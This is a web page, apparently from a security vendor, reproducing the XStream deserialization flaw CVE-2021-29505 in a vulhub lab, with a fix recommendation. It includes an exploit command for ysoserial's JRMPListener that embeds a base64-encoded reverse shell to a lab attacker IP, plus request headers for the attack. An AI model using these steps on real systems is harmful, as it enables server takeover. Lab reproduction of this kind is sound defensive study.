浙江省委宣传部副部长、省委网信办主任赵磊:守正创新 辩证施策 全力推动网络生态治理工作迈上新台阶
2026-02-10
美创产品全面入围中直机关2025年网络设备框架协议采购项目
2026-02-04
连续5年!美创再获中国网络安全产业联盟“先进会员单位”表彰
2026-01-21
每周安全速递³⁷¹ | 勒索软件攻击导致心理健康机构超11万人数据泄露
2026-01-06
四年同行,韧性共铸:西南某商行携手美创科技再度通过年度容灾大考
2025-12-26
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务XStream是一个常用的Java对象和XML相互转换的工具,攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成反序列化代码执行漏洞。该漏洞允许远程攻击者直接获取服务器权限。
漏洞编号
CVE-2021-29505
影响范围
xStream <= 1.4.16
环境搭建
1. 使用vulhub进行漏洞环境搭建
https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
2.执行如下命令启动镜像环境
docker-compose up -d
图片
3. 访问地址:http://192.168.166.133:8080/
图片
漏洞复现
攻击机ip:192.168.166.131
靶机ip:192.168.166.133
1.在攻击机上使用ysoserial的JRMPListener启动一个恶意的RMI Registry(工具下载地址:https://github.com/frohoff/ysoserial)。其中的bash命令需要进行bash64编码。
图片
2.Bash64编码后的反弹shell命令如下
java -cp ysoserial-master.jarysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjYuMTMxLzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"
3.执行过程如下
图片
4.执行如下数据包
POST / HTTP/1.1
Host:192.168.166.133:8080
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection:keep-alive
Upgrade-Insecure-Requests:1
Content-Type:application/xml
Content-Length:3119
图片
5. 获取反弹shell
图片
修复建议
升级XStream到1.4.17版本及以上版本。